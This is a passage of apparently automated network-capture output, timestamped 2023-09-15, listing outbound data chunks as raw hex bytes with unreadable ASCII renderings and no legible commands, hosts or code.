                                                                                                                                                                    2023-09-15 20:16:20 UTC352OUTData Raw: ef e2 be be 78 8f fe e4 8b d7 38 61 68 a3 ef fe e9 12 fd 0f 66 d4 6b 09 d0 a5 8f e1 f1 8a 10 ff cc e8 51 d4 70 25 6f 56 9f 53 c2 40 1c 51 5c bb 89 b6 40 ad 30 96 fd c7 f4 4d 6e 0e d2 3b 55 3d 66 68 44 f0 a2 49 b7 a0 d3 0d 7c 61 1f c0 f1 c5 a0 10 f5 31 ed 16 d3 04 3f 08 a5 82 67 ee 88 01 9e dd aa 61 1d cf b2 c6 5f f5 eb 5d 30 8a 3f 44 e0 3e 48 a4 c4 46 0c 55 5c c7 c7 56 f8 5b 74 0e ec 91 a6 c1 a3 d2 16 81 ec 0d e8 59 34 fb d8 5d 3b a0 21 09 31 1c 8c cb 70 53 cc df a6 27 48 4d b6 b8 07 08 50 2a 97 2d 02 24 7b 25 4f 54 ea f7 b4 60 8b 39 f4 d9 5c d0 9d 47 4a b7 6f 24 d1 10 1d 0f 8f 98 cc 66 be c9 9d a4 a8 f8 92 cd 35 91 f8 62 f6 cf d9 a9 90 6d f3 17 eb 85 b2 04 e0 2f 55 f4 4e 7b 55 a6 57 44 96 02 e2 69 5d 6d b6 30 e5 55 97 50 0d 62 8b 92 51 8b e8 e7 8f a3 e4
                                                                                                                                                                    Data Ascii: x8ahfkQp%oVS@Q\@0Mn;U=fhDI|a1?ga_]0?D>HFU\V[tY4];!1pS'HMP*-${%OT`9\GJo$f5bm/UN{UWDi]m0UPbQ
                                                                                                                                                                    2023-09-15 20:16:20 UTC368OUTData Raw: 9f 2f e7 3c c7 42 3d 07 b7 fc 2a 96 df 6e e2 84 fd f9 56 c1 29 1b 81 c8 9a 22 74 e1 cb 0e 80 b9 d0 92 2f ef 4a 9a 54 0e 20 bc 81 7d 99 87 ef 94 ee 1e c7 67 0d e0 10 ee 3b 46 c0 f3 40 46 7c 4f a1 46 da 47 68 3b b8 29 1e 2b de cd fe 9a 9d db 1e 1e be 0e 4e df 5f 0f cc 99 01 c3 6a 95 e8 8f f4 e0 17 7c dd 5a ca c2 76 82 30 ff 2a 5c 32 11 a3 02 1f 3f 70 60 f8 ba 66 c1 1f 83 84 2d 6c 8f e8 6d e3 95 33 4a 6f 9d d4 18 1d 53 d6 09 7a f6 e3 d2 d5 2b 71 76 83 0a 7e ce e9 a9 70 83 4e 93 31 6d 00 7f e3 9d 53 d3 2f d5 10 40 60 8a 2e 00 76 7c 79 4d da a0 31 5d 5f 26 87 71 14 ed 32 ca 7f db c8 d1 19 a0 40 63 2c b9 e7 fb 84 5e 8d d5 1f 26 2e 83 19 b8 07 50 d2 cf c4 6a 91 8a 5f 38 8e d8 7e ad ca e9 aa c7 71 4b 0c 72 d7 32 53 4b 62 c9 d8 60 71 d7 ed e4 60 f8 18 fa f3 d7 57
                                                                                                                                                                    Data Ascii: /<B=*nV)"t/JT }g;F@F|OFGh;)+N_j|Zv0*\2?p`f-lm3JoSz+qv~pN1mS/@`.v|yM1]_&q2@c,^&.Pj_8~qKr2SKb`q`W
                                                                                                                                                                    2023-09-15 20:16:20 UTC384OUTData Raw: f3 83 dd 58 e8 05 fc 53 7c d6 54 7d 64 0d 34 12 21 f5 0b 6d 3d da a4 9b 08 e0 d0 ed 3b 6e 05 11 71 75 5b 14 07 cb 55 0d b0 74 fb 6f 4c 2a c2 16 8a 6a b9 bc aa bc 4d 69 cd 59 fe 25 3c 56 16 dc d5 13 ed 18 43 a5 42 68 c1 a1 32 10 54 80 95 1c 02 2e 11 22 22 d9 67 26 c8 ed b9 63 d6 e4 15 cf 06 94 c9 76 42 a8 2a 42 5e 41 a2 40 d3 f5 16 5e d2 f7 4e 27 df 42 93 8d dd bf 56 24 21 a9 9e 89 f0 3d 00 3a f5 f0 83 6e c3 47 61 1e 6c 75 86 54 01 09 3f 31 1b 70 6e 1a ee 25 e8 6c 05 74 2d 8a 37 fe e1 f2 5e f1 da eb 84 68 1f 75 87 cf c3 75 73 ae 14 0f db 4a bf ab 7b d4 b7 ca 10 f2 ec 15 24 be 48 e3 18 92 36 4a 36 0f f9 fe 5a d7 ea 78 9f e4 e2 78 1f 8d 9c 8d df 23 eb ed 71 cb 28 3b 6a 81 ea 2a 39 67 ef 97 de 6a 38 69 9d a4 02 c1 e3 73 64 9e c8 2b f5 67 dc b7 dc ba 35 49 0b
                                                                                                                                                                    Data Ascii: XS|T}d4!m=;nqu[UtoL*jMiY%<VCBh2T.""g&cvB*B^A@^N'BV$!=:nGaluT?1pn%lt-7^huusJ{$H6J6Zxx#q(;j*9gj8isd+g5I
                                                                                                                                                                    2023-09-15 20:16:20 UTC400OUTData Raw: d6 06 ee f7 f4 52 d8 f8 09 75 e0 8d 36 19 cf 56 30 6e 36 ff 4e 19 64 bd 03 97 26 bd 5f 33 d0 76 78 7f 46 7d bf a5 6f ec cf 1d 14 1e 10 38 f4 38 c7 93 0a fc aa e1 43 b4 56 82 fa d8 db b9 03 f9 24 bd 60 34 53 fb 21 0c f9 7c e4 74 88 4c 84 f9 65 a3 e7 a0 ac 45 fe 32 fc 8d 41 73 44 84 3f 86 e3 81 ce ab 93 da 8a f1 11 fc 4b 6e ba cd 91 14 02 02 02 43 1e e3 d7 a9 c2 df 65 c8 47 bf d1 93 66 f8 28 77 07 7e 43 ff 76 07 88 45 1a b9 60 dd 52 a3 5f 34 42 14 9f 48 c5 3d 9c 4e a2 3a dd 3f fd 2e 4f b0 44 f7 9b ef 35 03 9b 27 55 50 68 34 17 b5 10 dc 3e c9 e6 bd 7e e8 35 db ce e5 c1 99 48 24 81 86 5b 3c a2 87 85 5e e8 a5 8a 2d 47 5a 7c 05 b1 c0 95 0f 9d 68 49 bd c3 30 b0 c7 59 4e 33 f6 7b 2a 6f 4d 21 53 31 88 a7 dd a5 ad 94 69 d2 62 7a fc 75 00 0a 30 84 4c b2 2b af 61 8d
                                                                                                                                                                    Data Ascii: Ru6V0n6Nd&_3vxF}o88CV$`4S!|tLeE2AsD?KnCeGf(w~CvE`R_4BH=N:?.OD5'UPh4>~5H$[<^-GZ|hI0YN3{*oM!S1ibzu0L+a
                                                                                                                                                                    2023-09-15 20:16:20 UTC416OUTData Raw: 0e 6e 87 85 7c ed f1 87 16 73 2a 3b 7f e4 94 7f fe 1b 31 ac fe 86 60 69 b0 a5 f7 91 e1 4c 4e 1a 33 c4 3b 4d df 3a 05 cd 46 1f 62 13 7c c5 c3 61 d8 41 50 7c 56 f6 6e b6 0c 1b 53 ce c8 56 f3 e2 da 41 76 e3 e3 47 41 35 ec f1 43 40 22 ff 4b 2d a0 70 d5 56 aa 9d 7f af ee 04 f7 59 04 19 e2 fb 1f 93 5d 32 f8 79 bd 75 2b 0d e2 e3 7a 16 55 5b 4d 88 b2 bf cf 62 69 3b 7b 44 23 5e d7 85 3e 6b bc 4b 58 2d 10 55 db 22 5c 94 13 4a ab 09 d5 34 7c 8e ea b4 4e 5b c7 11 80 ed 6e 83 ba 80 bf 74 52 83 2f dc f8 e9 bb b9 cd b2 9a 5d fc 4e 99 5e c8 3c 08 27 52 07 fc 52 a4 49 b7 3d 2b b2 a0 2c 43 fe ee 73 d0 7f b2 d8 08 49 5b 8c 9b 18 64 62 7a dc a1 f7 77 1f b2 86 2c f8 49 c0 e1 fe 9f 6d 45 34 d3 86 5b a0 ec 91 47 2f e3 55 4a 28 21 09 0d a9 47 0c d0 c3 0c 7d e6 d3 9e c3 f4 e3 02
                                                                                                                                                                    Data Ascii: n|s*;1`iLN3;M:Fb|aAP|VnSVAvGA5C@"K-pVY]2yu+zU[Mbi;{D#^>kKX-U"\J4|N[ntR/]N^<'RRI=+,CsI[dbzw,ImE4[G/UJ(!G}
                                                                                                                                                                    2023-09-15 20:16:20 UTC432OUTData Raw: 70 5c 2d b1 11 d6 28 90 9a d9 f3 4c f7 2c 42 03 d2 e7 6e 89 36 ce 07 b4 93 18 5c 0f 27 3d 6f 5e 4e d4 2b 32 c9 ad fa 21 6e bc 60 87 d8 bf 12 20 74 3e 74 9e b0 cd cc b7 d7 84 dd 5b 9b 91 5b fa 7d 19 8c 2f 08 b7 20 76 62 10 e0 c7 9f 7d 0e 64 c3 a7 4e 3c 81 8d ab 27 36 fe 1a a0 1f 31 cf 29 0b 55 e7 26 13 84 a6 d5 09 07 22 df 00 16 bf 56 68 e3 68 ec 93 09 67 83 04 0c 2e 6a bb 5c a3 cf f9 13 a1 2c 11 be 7b b6 ce 5a 75 08 2b 3b 54 47 d0 56 ab 5e 0c f1 3d 1c b8 73 13 09 c9 fb 63 1f be 84 17 9a d4 55 68 2d a7 30 1e 2a cd 08 1c 36 d9 3b da cb be 5c a5 f7 45 76 fc be 71 2f a4 13 fa 2c d7 64 73 6b 8d d6 a5 aa 87 80 70 26 34 7a 61 9e 33 ed 95 7b 1d 4e f1 e0 3f b4 22 8a e2 1e 65 47 98 f2 ba 79 b6 cb 49 9d 57 61 82 42 2a ed 50 50 99 04 c7 ca fe 55 90 26 8d 5f d1 1b 76
                                                                                                                                                                    Data Ascii: p\-(L,Bn6\'=o^N+2!n` t>t[[}/ vb}dN<'61)U&"Vhhg.j\,{Zu+;TGV^=scUh-0*6;\Evq/,dskp&4za3{N?"eGyIWaB*PPU&_v
                                                                                                                                                                    2023-09-15 20:16:20 UTC448OUTData Raw: cb bb 5e 4b af 7a fa 9a 5d b9 59 82 07 bc 3c 2f a2 b0 8a df 74 27 26 07 c2 22 eb ac b5 57 80 96 c3 df d6 68 98 ca e4 8c ee d9 44 07 8e 27 86 24 ab 21 d3 7f 05 5d 7a c4 a6 b7 ab 6f 06 16 51 4b a3 b9 fd 9b 26 0a 5d c7 65 64 ce 01 7c c7 dc d0 3d 57 0b e4 15 e7 4c 07 30 a2 6a a2 75 9d a0 1c 38 ef f8 5d cb 25 63 30 5b f5 3f 65 09 20 06 44 68 ec 61 72 c4 ec bf 09 b9 6f 4c 41 c4 df 5a 26 fe da ac a2 7d a8 2f 98 5f 18 b4 1a d6 0c 2f 41 9b c1 72 6c a0 b1 01 d9 99 90 9a 92 d9 73 b7 20 02 2f 29 48 45 7e 5d 4e 4d c6 6c 08 0e 00 86 d2 fd 32 21 b9 91 cd a0 75 f2 d5 d3 ed 70 9c 55 77 5c 41 e7 6e 84 e5 01 e8 2b f0 47 d6 09 1d ac f6 cb d3 7a 80 6f a1 46 0e cc 39 ec 80 fe 76 78 00 71 09 71 9f 31 ca d6 c2 1c 82 0f 8d 61 28 21 e5 5f 53 74 24 02 24 91 8d d0 49 7b fe c8 ee a3
                                                                                                                                                                    Data Ascii: ^Kz]Y</t'&"WhD'$!]zoQK&]ed|=WL0ju8]%c0[?e DharoLAZ&}/_/Arls /)HE~]NMl2!upUw\An+GzoF9vxqq1a(!_St$$I{
                                                                                                                                                                    2023-09-15 20:16:20 UTC464OUTData Raw: cc 68 7f 64 d1 c3 5d 64 48 16 dd de 83 b4 3b 21 8a 21 14 68 93 2b ed 7c 43 09 14 04 1d 00 e9 28 11 6a e0 fb 9b 76 41 2f b5 f9 ac cd e4 3a bc 70 2b e7 bd b7 da 2a 05 2b 97 e7 0c 01 2f ca cd 98 ad fc ea f3 a1 d6 d6 fa 1a 74 cc e4 62 e8 db 79 36 7e 9b ad c6 fa ad 54 5e 85 bb e4 4c 00 60 d1 8a 46 1d 98 1a 0a 59 c6 db cb 86 ed ca bd 1b 77 cf 74 8d 8a 2e 54 7e e9 f6 a0 f8 91 b4 fe 24 ab af 42 12 a5 a7 03 ea eb 6e 70 64 67 d2 8b 6e 1f da 74 2f 25 e1 25 cb 09 5b 2e 24 6a b8 bb de 91 fd 39 92 1f 15 79 eb fb 8a 9c 4c 92 4e fe b8 30 fa 2c 02 34 2c a8 91 73 17 b8 6d 02 e6 24 cb 3f 04 e3 b8 53 99 fd 59 08 92 b9 4c 59 e1 2c 08 91 bf 41 35 c2 ab c5 33 b4 20 2a f2 3b 95 07 f7 59 11 95 94 c4 1b 67 9d c9 d1 d2 19 34 07 9b 55 2b 9f 4c c4 6f 71 7e fb 47 ff e0 10 eb 17 41 56
                                                                                                                                                                    Data Ascii: hd]dH;!!h+|C(jvA/:p+*+/tby6~T^L`FYwt.T~$Bnpdgnt/%%[.$j9yLN0,4,sm$?SYLY,A53 *;Yg4U+Loq~GAV
                                                                                                                                                                    2023-09-15 20:16:20 UTC480OUTData Raw: 97 a6 03 a8 fe 76 3e 2a e0 21 b5 a4 b5 f3 06 56 4a ab 34 05 4f 7e ed a5 1d b8 4d 65 d1 81 9a f9 2e 52 52 b3 3b 90 a8 a1 34 7c 5c cf 85 88 de 89 a6 5b 60 a0 4b 89 23 2e 9d 88 85 b5 d4 37 54 76 85 04 12 b6 e5 a1 93 ef b8 28 0d 6f ab d1 3c db 5e 64 38 ab 2b f8 2c dd ad ec 34 7f 0e ec 43 ca ef 55 b4 cf ee 73 6f ec 89 28 d5 fb 9e 62 ad 22 3c 69 d9 1a 63 d1 f6 1b bc 26 2e 1f 26 06 08 0d 47 24 4b fe bb 18 1d 26 0e 28 8c 3f 76 92 18 c9 0f f3 24 2a 78 e5 82 46 aa ad a0 74 59 68 c0 6b e2 aa 4d 39 97 3a 39 37 00 34 4a 2c 6f be c8 b2 02 32 ad c4 af e3 0c d8 8e 19 e0 d2 ad 0b 9d 55 cb ef 81 40 03 83 d8 dd 90 bd 86 e0 3c 24 33 9f 0f 2f 5d 94 e7 14 ba fb a6 d8 0a c1 b6 35 77 cc 9a 9f 26 35 c3 9b 3d 39 dc 0f ac bb 14 5a 17 d5 44 49 5b 7b 52 ad 0f 62 82 02 96 20 29 5e 3c
                                                                                                                                                                    Data Ascii: v>*!VJ4O~Me.RR;4|\[`K#.7Tv(o<^d8+,4CUso(b"<ic&.&G$K&(?v$*xFtYhkM9:974J,o2U@<$3/]5w&5=9ZDI[{Rb )^<
                                                                                                                                                                    2023-09-15 20:16:20 UTC496OUTData Raw: 20 c7 87 32 34 ab bf 87 ca d4 8b 27 3c bb 09 99 b8 e0 51 ad f6 fd b1 98 02 57 ca c9 d0 dd c5 f2 43 0d b9 15 92 49 a0 44 1b 97 7e 46 2a 85 da d9 06 f1 98 0c e1 35 26 c3 6a 75 7b a8 da ce b7 bc f6 17 ac c6 97 30 04 86 02 83 04 c8 f2 2d 30 04 98 2f 2a 59 86 99 4c 8e 67 8a fd ea 04 a8 33 4d 02 5b 5f 11 4b fd 50 30 7b 9e 46 77 56 1d 0a 25 35 8e 54 6d 75 76 61 a9 f5 80 0c b3 06 2e f2 a5 70 6c 0a 01 76 13 bb fa 9f a0 f5 5e 77 61 fb 08 3c b1 3e 2a fd 94 08 8e da 90 f3 14 82 d1 db cd f6 ed b7 c0 c0 2a 63 74 3c 29 89 a2 01 ea 53 1c 27 f6 14 71 88 9f 1d cc 42 61 5f 16 7f 1e 9d 9b 13 60 a5 4b dd 3a a8 3b 9a bc 84 dc d8 16 74 88 8e 30 db 8d c4 26 d9 cb f7 bf 2c be 9a f6 02 ea 07 6b ad 00 45 fb 62 4d 34 13 ed d5 f5 10 56 f5 ff 1d 48 ce c4 e3 cc 19 3a 08 ba dd 32 ae 0e
                                                                                                                                                                    Data Ascii: 24'<QWCID~F*5&ju{0-0/*YLg3M[_KP0{FwV%5Tmuva.plv^wa<>**ct<)S'qBa_`K:;t0&,kEbM4VH:2
                                                                                                                                                                    2023-09-15 20:16:20 UTC512OUTData Raw: 97 f0 90 45 ea 9e f5 ea 1b fe d8 ad 50 cb f9 13 c8 a3 0e 27 35 cf b9 f3 3b f4 0f b2 c6 62 31 f0 18 f5 d4 0b 5e 17 97 8b 0b a3 c9 d4 a1 6d a3 8a ed b1 a0 d0 aa 3b 7e 6d ce e6 52 15 29 e8 a7 d1 6f 07 39 8c 8f b0 46 d1 d8 2d 82 11 21 6e 91 ba b2 6e 58 5f 98 b2 f7 a7 3d 7a 67 15 fb a3 2a 4e b8 21 be e4 48 39 82 53 fc b2 6a 61 b2 31 ad 1f 2e f0 df ba 6b e3 22 cc 4c 04 e6 65 30 1c b9 3a 6e 4c 82 ba 97 37 fa 7e 9f a2 90 88 d8 3a 3d c7 a4 2e 1b 96 f3 3a ac c4 a0 dd 89 76 6e eb 92 cb 44 5d 73 ee 0c 54 00 e4 12 d9 95 ce 57 78 8c 2a 7e f9 c8 0b 33 1f f8 4d 84 05 97 e0 86 d3 06 50 54 48 dc 2b f5 f7 95 13 ac eb 1f 29 51 4e 98 5a d6 96 77 30 e7 44 5d e1 c1 70 fc 8b c9 21 b1 28 23 18 75 a5 5b 9a 81 ee 02 cd 58 88 73 ec c3 80 f3 13 1b 2a aa f6 73 14 1e 20 6c ab 10 a8 3e
                                                                                                                                                                    Data Ascii: EP'5;b1^m;~mR)o9F-!nnX_=zg*N!H9Sja1.k"Le0:nL7~:=.:vnD]sTWx*~3MPTH+)QNZw0D]p!(#u[Xs*s l>
                                                                                                                                                                    2023-09-15 20:16:20 UTC528OUTData Raw: 96 97 35 e6 93 c4 92 f5 ce d3 3d e0 35 99 37 2a ec f5 5b be c1 fb c3 b6 40 b5 28 18 d2 4c cd d3 8e 64 0a 75 88 82 1e 27 dd be 3b 2a 41 56 1f 87 b9 ec f1 09 97 6e 24 6f 2b 15 87 97 46 8a b7 22 01 2d 54 e7 16 ca d2 e9 f5 c2 d2 64 64 6b 21 27 f8 db 19 37 52 55 1e 2d 65 54 3f 86 68 fb 10 7f 1a 03 b3 36 b4 6b c7 4e 1a 6b ed 51 81 96 5d 5a 60 ce 88 91 c3 d4 ef a8 56 b3 1a c5 03 17 35 04 f2 3d 8f 01 c6 11 7e 59 09 be 30 60 b3 b5 a3 ef 73 e3 d0 d7 15 96 d5 d8 51 98 8c 2f 12 5d 0a 8b 4d 67 50 0e d9 cc a5 69 bf 64 c7 2f c9 56 c2 74 ef 77 32 73 85 af 5d e1 ce 5b 2b 05 7b 7e 31 8c de 2a cd 97 bc 8e 39 56 b2 47 a9 3e 05 61 5f 6e dd 97 aa 5e 05 f3 00 cf dc 91 7b 39 5d 9d 59 99 fa 36 63 8b 05 d9 8e c7 d0 cf 13 26 cb d9 04 f6 5a c7 15 0e 56 17 3d 31 c9 75 00 f6 97 1d dc
                                                                                                                                                                    Data Ascii: 5=57*[@(Ldu';*AVn$o+F"-Tddk!'7RU-eT?h6kNkQ]Z`V5=~Y0`sQ/]MgPid/Vtw2s][+{~1*9VG>a_n^{9]Y6c&ZV=1u
                                                                                                                                                                    2023-09-15 20:16:20 UTC544OUTData Raw: 0b 5a 2a 4e fd 52 ed e2 8c a8 5b fc c2 57 48 34 41 94 b2 2e dd c6 29 7c 51 74 81 a9 40 82 34 d2 27 df cb df 2a 5b 2a a8 60 b2 55 ba ed 08 cc ac 0b 31 b9 33 9e cb ca 34 dc 84 8a 8e a0 81 e0 87 74 d8 63 8e 9c fc 28 85 58 91 36 d9 a2 e1 f9 c2 3e ce 8f 65 ad c8 a8 9e d8 4e 80 8a 48 6e 76 6c da 0d 68 bd e8 75 4e 9e d1 b9 b7 71 6f 98 01 e5 4b 3f 69 36 92 90 50 de f9 91 63 a3 d8 40 4a 08 31 9d 40 a8 2c 62 cd bb cb 34 67 12 fa fa fb e9 c6 9c 08 57 81 00 01 a2 43 b0 55 5d fd 89 c7 45 5e 86 f0 38 a9 f4 1b c1 74 36 59 ff 7c 29 90 65 65 31 a9 f7 28 48 bd a0 20 cf e8 fd 46 eb cd 51 d4 79 d7 1e f6 5e ed 09 ca 6d da 39 b5 32 20 e8 51 23 e5 c5 ee 5a 9a 20 7d ad 57 c6 f0 80 a0 8e 97 cd c4 a1 58 df 79 4c 33 72 88 ad 1f e8 03 1f bb 96 cb 87 c8 c4 11 0b c4 87 2b eb 8f 81 37
                                                                                                                                                                    Data Ascii: Z*NR[WH4A.)|Qt@4'*[*`U134tc(X6>eNHnvlhuNqoK?i6Pc@J1@,b4gWCU]E^8t6Y|)ee1(H FQy^m92 Q#Z }WXyL3r+7
                                                                                                                                                                    2023-09-15 20:16:20 UTC560OUTData Raw: 9b b7 c6 91 b2 83 84 bd 79 5b 85 6d d9 06 fa 9a 8b 88 88 a0 cc 06 4b 79 bf ac 4b bd 64 09 5b 5a 41 3a 91 e9 92 2a cd c3 d8 38 13 3f 6c 7a 4a 98 bc 98 11 c3 38 1c ff 5b a4 f3 81 64 33 c0 bd 4c f2 cd 51 9f ce e2 1d 5b f5 61 13 85 77 d1 20 de a1 8b 49 59 52 a4 48 cb ec bf 68 cc 0d 40 29 ce 5e 86 85 24 5e be cf 56 f6 c9 90 68 96 b4 4d 53 fd e7 46 65 9f 19 25 80 0e a8 d7 2f 6f 1c 48 b0 f1 a3 3c f6 9a 73 19 1f 8f 12 06 57 d4 ec 83 b6 3e c6 82 4e af 56 ee 1e 02 0e 18 f3 da c4 e3 e2 d1 4f 4a bb 58 54 3f 76 c7 4a 52 86 2b 0d 29 3d 5a 61 ff e6 3b df 3d 18 00 48 5b d5 b6 b5 94 38 62 c3 4a b8 10 6b 94 dc cd 28 c2 12 0e f3 9f df bd 60 33 a8 18 f2 da 33 38 29 02 19 30 d1 c8 0c dd 4a d0 bc 00 40 69 74 0a 2f 25 9a f3 d1 ac e0 02 e5 25 51 ad f6 49 0f e4 66 35 a6 3f 9e c0
                                                                                                                                                                    Data Ascii: y[mKyKd[ZA:*8?lzJ8[d3LQ[aw IYRHh@)^$^VhMSFe%/oH<sW>NVOJXT?vJR+)=Za;=H[8bJk(`338)0J@it/%%QIf5?
                                                                                                                                                                    2023-09-15 20:16:20 UTC576OUTData Raw: 80 32 9c cd 6a a9 04 4c 7a 0c 5e fc 1d 07 17 11 60 c4 ce 37 c6 7d f4 39 53 bb bb 9a eb d0 9e 14 c5 dc 3a 47 42 49 c1 2d 90 e0 26 75 85 a3 73 db 4f d2 e5 4f f5 df 20 7c 85 9a b7 b6 c2 a3 ba e9 8f e2 02 2c 6f 14 25 a0 cd c1 ec 40 93 c4 b8 c7 1d b5 59 24 0a 8d ee d8 f5 b8 3e 48 3b 8c d7 5c 0c 83 53 02 93 55 8c 6b af 76 81 a8 0c da 38 85 58 d4 92 c9 7d 1f 29 b8 52 54 2d 6b c5 6e ea b8 1e 28 64 94 53 b1 ae c8 45 29 a0 62 81 a6 35 c8 19 a5 a7 f0 2e f4 f8 1b 1d c6 9f 75 ce 46 0b 44 46 5c e0 67 3d 44 1e 9b 42 0e 06 28 2d 22 ea 0f ab 86 70 5b 56 59 03 5e 9f 53 1d 65 99 5f 37 df 98 cf 37 e1 cd b2 bc 06 92 8e 6f 2c 1b 87 ca 43 b2 1d 0f 93 a4 aa fa 43 52 24 8d f4 6e 4e bc 99 ed e7 3c 41 94 b2 38 13 bc d2 d3 b3 a8 39 58 d5 9b e3 b2 87 55 09 74 8f 7a cd 12 4f 79 94 3a
                                                                                                                                                                    Data Ascii: 2jLz^`7}9S:GBI-&usOO |,o%@Y$>H;\SUkv8X})RT-kn(dSE)b5.uFDF\g=DB(-"p[VY^Se_77o,CCR$nN<A89XUtzOy:
                                                                                                                                                                    2023-09-15 20:16:20 UTC592OUTData Raw: e9 6d 89 9f fd b3 b1 63 23 bf 22 4f 0d 97 b1 d2 9f 00 9d 4e 86 b8 a7 cd 7b e8 9f a0 66 9e 05 d8 11 f0 5f a5 bd 37 80 2f 2c ca bf ab 54 93 b6 1f ac bb 98 0a e9 c4 90 5e 95 56 2b ff f2 76 a2 22 e9 c9 df 1c 46 43 6b 0f 2c 0c 29 63 6e 8d 5f 32 cc ab f0 48 50 63 ff da ed c9 f6 c6 7c 54 ac c0 40 a2 08 63 f0 70 88 87 6d 43 f6 06 ae 1c 6e ca 22 16 2a 7b 5d 6b 9a 42 d3 40 30 f8 19 8d 51 7f 3f b1 2f 8e 8c c2 b5 92 cc 96 1b d0 54 9e f2 8e 59 6a 92 60 18 a1 b4 15 e5 2a 67 57 6e c6 fa f0 3e 49 d6 48 45 a7 29 45 93 63 e1 63 8d 82 e6 e5 c4 a3 6f c6 00 89 fd 51 62 71 9c b7 97 64 12 80 34 6b 6d 0c ad 11 d9 f7 e9 a7 99 0e e9 3e 38 a6 37 b8 9c 23 d6 55 a3 8d f2 d2 7b 3d b2 1d 40 96 68 19 7d 0b 70 25 5a 4f 3f f2 fc 8e 07 fa 40 a2 89 b5 86 34 f0 8f a2 20 5d 28 af a7 2d 11 e1
                                                                                                                                                                    Data Ascii: mc#"ON{f_7/,T^V+v"FCk,)cn_2HPc|T@cpmCn"*{]kB@0Q?/TYj`*gWn>IHE)EccoQbqd4km>87#U{=@h}p%ZO?@4 ](-
                                                                                                                                                                    2023-09-15 20:16:20 UTC608OUTData Raw: 47 b2 c6 2f 2f bb 2a 8a 0a d6 b5 a4 b3 b9 5e f5 2d f6 23 5c 39 c7 e9 c4 af 79 a1 f7 ba db 5b 06 dc da c5 d5 fa 79 1b 20 ea 50 91 ab 1d fd 8d bc 1c 5e 52 1a 0b ed 98 61 b1 60 f6 c4 ee 20 cb e8 9a 6a 1f f0 6b df 2c d3 98 13 d2 08 df 35 92 c6 8c ce 49 bd 67 47 36 8f 58 c4 52 5b 96 6b 66 78 11 7a 9b d3 a3 7c 06 ea be 72 3f 8a 4d 9c 03 fb 73 94 69 e5 1f ad d9 31 f8 ee 23 17 eb 57 ef 22 07 6d 00 4d f8 9d b7 c8 01 4e 56 a7 03 b4 12 f4 5e 18 3c 32 9e 21 b5 8c e3 d8 8c 04 23 a3 df d0 2c 90 d4 8f aa a6 e4 fd 2e b9 55 6f b4 29 ef 8c 3e bf 55 7a 76 81 58 3f e4 76 ff 44 fc b1 37 4b a9 c7 fb 54 17 fc 16 a5 c1 a3 94 85 34 c4 06 05 e9 cc 4b be ef f4 db 8f da 52 29 59 55 d3 58 94 7e b9 42 da 87 de 86 ad 2a 95 2a db a2 b9 b4 fa 1b 9f 40 30 a7 45 a9 87 df bd 19 66 2f 93 06
                                                                                                                                                                    Data Ascii: G//*^-#\9y[y P^Ra` jk,5IgG6XR[kfxz|r?Msi1#W"mMNV^<2!#,.Uo)>UzvX?vD7KT4KR)YUX~B**@0Ef/
                                                                                                                                                                    2023-09-15 20:16:20 UTC624OUTData Raw: dd 80 9c b3 b7 fe e5 44 0c 41 53 9f 4c 32 09 39 b3 ca 57 c3 87 71 ba b8 7d ad 37 ed 9b 73 2a 15 27 1f 8d 77 68 5b 3a 05 fa 2e 4f b8 bd bc d0 25 14 75 14 94 2d f4 c5 7f dd 05 54 61 56 ec 3b 19 99 03 c4 11 12 9f f4 83 0e 57 68 67 32 44 69 e4 eb 4d 6a 5b 77 13 8e 14 5e f6 d6 2f 5e 78 f2 d0 30 11 7a 4f 0a d8 bd 9c 2e a6 e9 b1 c1 36 6a b9 06 b6 ed 9c e9 cd a4 e8 42 6c 4f 67 59 68 75 28 cf 7b 49 f9 6c c9 28 a5 c9 d0 5f 9a 24 22 89 4c 4a cb fe b4 69 3b fb 1b 40 55 3f a2 ac eb 05 26 1c ee 1f b7 d7 40 2a 7f 85 dc 57 6a 6c 27 67 6a dd 90 29 70 4d 67 86 1c 42 61 99 04 7f 0e e8 cf f4 00 68 39 96 fb 43 52 33 59 6f 56 cb e7 5d a7 eb 6c 2d 38 c8 c6 18 a8 21 50 38 f5 4d 54 30 e5 c2 e8 b8 5d 98 7f 6d 10 88 9b 8c 1a 23 b5 72 72 44 6e fd ae 56 ac 46 3d 4e ec 5b 39 aa 86 67
                                                                                                                                                                    Data Ascii: DASL29Wq}7s*'wh[:.O%u-TaV;Whg2DiMj[w^/^x0zO.6jBlOgYhu({Il(_$"LJi;@U?&@*Wjl'gj)pMgBah9CR3YoV]l-8!P8MT0]m#rrDnVF=N[9g
                                                                                                                                                                    2023-09-15 20:16:20 UTC640OUTData Raw: 8f 44 da b1 af 1c 5e d0 e2 f7 b8 7b 32 d5 cd 54 4b 0f 15 9e fd 61 a5 8b b4 88 d3 31 2e 81 9e 29 09 bc 88 b5 91 b6 93 88 bf e3 ba da 1f 4c 7d 60 c9 b2 f1 dc f5 24 48 73 43 4a f7 db 27 68 d6 81 b6 f5 d1 c6 37 52 ff 02 3b be fe 31 66 6c 62 4c 34 a7 9b ea fe ad 23 bb 65 29 b8 c8 c7 5b 13 ca f6 a1 52 d5 f6 bf 31 ca 04 2a 83 d2 45 c0 77 67 96 1b 7e fe e1 78 de 1e f9 6f e4 2a e7 16 e9 23 17 d4 79 0c 1e dd 5c d3 d7 5a f8 4c 87 73 9b 81 ac 19 ee ac bd 98 78 f6 ba 8e 87 99 27 c7 2e 04 3d ca 89 60 81 f6 96 3f ab 11 3b 35 f3 84 57 fa 37 40 b1 f5 a4 04 4b 7d ca bd c4 86 87 49 9e b5 db 26 78 e2 3b fc 73 4d e9 40 00 b5 a9 9f 83 46 b0 10 3c 2d 33 df a4 61 ba 52 29 18 29 24 33 4d 90 4b d3 5d cb 90 d8 d1 66 3a e3 28 07 2f bd f9 4a 91 49 8a 2d 64 77 dd fa e3 4b e7 b9 9b 08
                                                                                                                                                                    Data Ascii: D^{2TKa1.)L}`$HsCJ'h7R;1flbL4#e)[R1*Ewg~xo*#y\ZLsx'.=`?;5W7@K}I&x;sM@F<-3aR))$3MK]f:(/JI-dwK
